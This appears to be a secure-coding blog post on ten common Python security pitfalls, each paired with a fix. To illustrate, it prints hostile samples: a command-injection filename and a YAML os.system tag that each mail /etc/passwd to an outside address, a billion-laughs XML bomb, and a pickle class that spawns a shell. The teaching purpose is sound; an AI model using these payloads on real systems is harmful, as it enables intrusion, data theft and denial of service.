Writing secure code is hard. When you learn a language, a module or a framework, you learn how it is supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception: even within the standard library there are documented bad practices for writing hardened applications. Yet many of the Python developers I’ve spoken to simply aren’t aware of them.

Here are my top 10, in no particular order, common gotchas in Python applications.

1. Input injection

Injection attacks are broad and really common, and there are many types of injection. They impact all languages, frameworks and environments.

SQL injection is where you’re writing SQL queries directly instead of using an ORM, and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. It isn’t. Familiarise yourself with all the complex ways SQL injection can happen with this cheatsheet.

Command injection is possible any time you’re calling a process using popen, subprocess or os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious.

Imagine this simple script [credit]. You call a subprocess with the filename as provided by the user:

    import subprocess

    def transcode_file(request, filename):
        # filename comes straight from the user and is pasted into a shell string
        command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename)
        subprocess.call(command, shell=True)  # a bad idea!

The attacker sets the value of filename to

    "; cat /etc/passwd | mail them@domain.com

or something equally dangerous.

Fix: Sanitise input using the utilities that come with your web framework, if you’re using one. Unless you have a good reason, don’t construct SQL queries by hand. Most ORMs have built-in sanitization methods.

For the shell, use the shlex module to escape input correctly, or avoid shell=True altogether and pass the arguments as a list.

2. Parsing XML

If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules.
There are a few common attacks through XML. Mostly DoS-style (designed to crash systems instead of exfiltration of data). Those attacks are common, especially if you’re parsing external (i.e. non-trusted) XML files.

One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
      <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
      <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
      <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
      <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
      <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>

Another attack uses external entity expansion. XML supports referencing entities from external URLs, and the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”

Another situation to consider is 3rd party packages you’re depending on that decode XML, like configuration files or remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks.

So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks.
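To make the amplification concrete, here is a minimal sketch that builds a deliberately tiny version of the payload and measures how much it grows once the standard library's ElementTree parser expands it. The helper names `build_payload` and `expanded_length` are made up for this illustration. Python's documentation notes that builds linked against newer Expat releases limit this kind of amplification, so the sketch stays small on purpose and only shows the mechanism.

```python
import xml.etree.ElementTree as ET


def build_payload(levels, fanout):
    """Build a small nested-entity document (hypothetical helper).

    Each entity refers `fanout` times to the entity one level below it.
    """
    entities = ['<!ENTITY lol1 "lol">']
    for level in range(2, levels + 1):
        refs = "&lol{};".format(level - 1) * fanout
        entities.append('<!ENTITY lol{} "{}">'.format(level, refs))
    return '<?xml version="1.0"?><!DOCTYPE lolz [{}]><lolz>&lol{};</lolz>'.format(
        "".join(entities), levels
    )


def expanded_length(levels, fanout):
    """Return (size of the document, size of the text after parsing)."""
    payload = build_payload(levels, fanout)
    root = ET.fromstring(payload)  # internal entities are expanded here
    return len(payload), len(root.text)


if __name__ == "__main__":
    sent, expanded = expanded_length(levels=4, fanout=10)
    print("document size:", sent, "expanded text size:", expanded)
```

Every extra level multiplies the expanded size by the fanout while adding only one short line to the document, which is why nine levels of ten references are enough to ask for gigabytes.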
The vulnerabilities are well documented: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

Fix: Use defusedxml as a drop-in replacement for the standard library modules. It adds safe-guards against these types of attacks.

3. Assert statements

Don’t use assert statements to guard against pieces of code that a user shouldn’t access. Take this simple example:

    def foo(request, user):
        assert user.is_admin, "user does not have access"
        # secure code...

Now, by default Python executes with __debug__ as true, but in a production environment it’s common to run with optimizations (for example, python -O). This will skip the assert statement and go straight to the secure code regardless of whether the user is_admin or not.

Fix: Only use assert statements to communicate with other developers, such as in unit tests or to guard against incorrect API usage.

4. Timing attacks

Timing attacks are essentially a way of exposing the behaviour and algorithm by timing how long it takes to compare provided values. Timing attacks require precision, so they don’t typically work over a high-latency remote network. Because of the variable latency involved in most web applications, it’s pretty much impossible to write a timing attack over HTTP web servers.

But, if you have a command-line application that prompts for the password, an attacker can write a simple script to time how long it takes to compare their value with the actual secret (example).

There are some impressive examples, such as this SSH-based timing attack written in Python, if you want to see how they work.

Fix: Use secrets.compare_digest, introduced in Python 3.6, to compare passwords and other private values. On older versions, hmac.compare_digest does the same job.

5. A polluted site-packages or import path

Python’s import system is very flexible. Which is great when you’re trying to write monkey-patches for your tests, or overload core functionality.

But, it’s one of the biggest security holes in Python.
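As a rough illustration of that flexibility, the sketch below shows that when two directories on sys.path both contain a module with the same name, Python simply imports whichever it finds first. The module name `hypothetical_settings`, the helper names and the "trusted" and "rogue" directories are all made up for the demonstration. It runs entirely inside temporary directories.

```python
import importlib
import sys
import tempfile
from pathlib import Path

MODULE_NAME = "hypothetical_settings"  # made-up module name for the demo


def import_with_path(first_dir, second_dir):
    """Import MODULE_NAME with the two directories prepended to sys.path."""
    original_path = list(sys.path)
    sys.modules.pop(MODULE_NAME, None)  # forget any earlier import
    importlib.invalidate_caches()
    sys.path[:0] = [str(first_dir), str(second_dir)]
    try:
        return importlib.import_module(MODULE_NAME)
    finally:
        # Restore the interpreter state so the demo leaves no trace
        sys.path[:] = original_path
        sys.modules.pop(MODULE_NAME, None)


def demo():
    """Return which copy wins for each ordering of the two directories."""
    with tempfile.TemporaryDirectory() as trusted, \
            tempfile.TemporaryDirectory() as rogue:
        Path(trusted, MODULE_NAME + ".py").write_text("ORIGIN = 'trusted'\n")
        Path(rogue, MODULE_NAME + ".py").write_text("ORIGIN = 'rogue'\n")
        trusted_first = import_with_path(trusted, rogue).ORIGIN
        rogue_first = import_with_path(rogue, trusted).ORIGIN
        return trusted_first, rogue_first


if __name__ == "__main__":
    print(demo())
```

Nothing in the import statement itself says which copy you get. That is decided by the order of sys.path, which anything able to write to an earlier directory can influence.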
Installing 3rd party packages into your site-packages, whether in a virtual environment or the global site-packages (which is generally discouraged), exposes you to security holes in those packages.

There have been occurrences of packages being published to PyPI with similar names to popular packages, but instead executing arbitrary code. The biggest incident, luckily, wasn’t harmful and just “made a point” that the problem is not really being addressed.

Another situation to think about is the dependencies of your dependencies (and so forth). They could include vulnerabilities and they could also override default behaviour in Python via the import system.

Fix: Vet your packages. Look at PyUp.io and their security service. Use virtual environments for all applications and ensure your global site-packages is as clean as possible. Check package signatures.

6. Temporary files

To create temporary files in Python, you’d typically generate a file name using the [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") function and then create a file using this name. “This is not secure, because a different process may create a file with this name in the time between the call to [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") and the subsequent attempt to create the file by the first process.” [1] This means it could trick your application into either loading the wrong data or exposing other temporary data.

Recent versions of Python will raise a runtime warning if you call the incorrect method.

Fix: Use the tempfile module and use mkstemp if you need to generate temporary files.

7. Using yaml.load

To quote the PyYAML documentation:

“Warning: It is not safe to call **yaml.load** with any data received from an untrusted source! **yaml.load** is as powerful as **pickle.load** and so may call any Python function.”

This beautiful example was found in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system() with the arguments provided in the file.

    !!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]

So, effectively, loading YAML files from user-provided values leaves you wide open to attack.

Demo of this in action, credit Anthony Sottile

Fix: Use yaml.safe_load, pretty much always, unless you have a really good reason.

8. Pickles

Deserializing pickle data is just as bad as YAML. Python classes can declare a magic method called __reduce__ which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host.

This wonderful example shows how to pickle a class that opens a shell in Python 2. There are plenty more examples of how to exploit pickle.

    import cPickle
    import subprocess
    import base64

    class RunBinSh(object):
        def __reduce__(self):
            # Unpickling this object calls subprocess.Popen(('/bin/sh',))
            return (subprocess.Popen, (('/bin/sh',),))

    print base64.b64encode(cPickle.dumps(RunBinSh()))

Fix: Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON.

9. Using the system Python runtime and not patching it

Most POSIX systems come with a version of Python 2. Typically an old one.

Since “Python”, i.e. CPython, is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to the allocation of memory, so buffer overflow errors.

CPython has had a number of overrun or overflow vulnerabilities over the years, each of which has been patched and fixed in subsequent releases.

So you’re safe. That is, if you patch your runtime.

Here’s an example from 2.7.13 and below, an integer overflow vulnerability that enables code execution. That’s pretty much any un-patched version of Ubuntu pre-17.

Fix: Install the latest version of Python for your production applications, and patch it!

10. Not patching your dependencies

Similar to not patching your runtime, you also need to patch your dependencies regularly.

I find the practice of “pinning” versions of Python packages from PyPI in packages terrifying. The idea is that “these are the versions that work” so everyone leaves it alone.

All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. All the time.

Fix: Use a service like PyUp.io to check for updates, raise pull/merge requests to your application and run your tests to keep the packages up to date.

Use a tool like InSpec to validate the installed versions on production environments and ensure minimal versions or version ranges are patched.

Have you tried Bandit?

There’s a great static linter that will catch many of these issues in your code, and more!

It’s called bandit, just run

    pip install bandit
    bandit ./codedir

PyCQA/bandit (github.com): Bandit is a tool designed to find common security issues in Python code.

Credit to RedHat for this great article that I used in some of my research.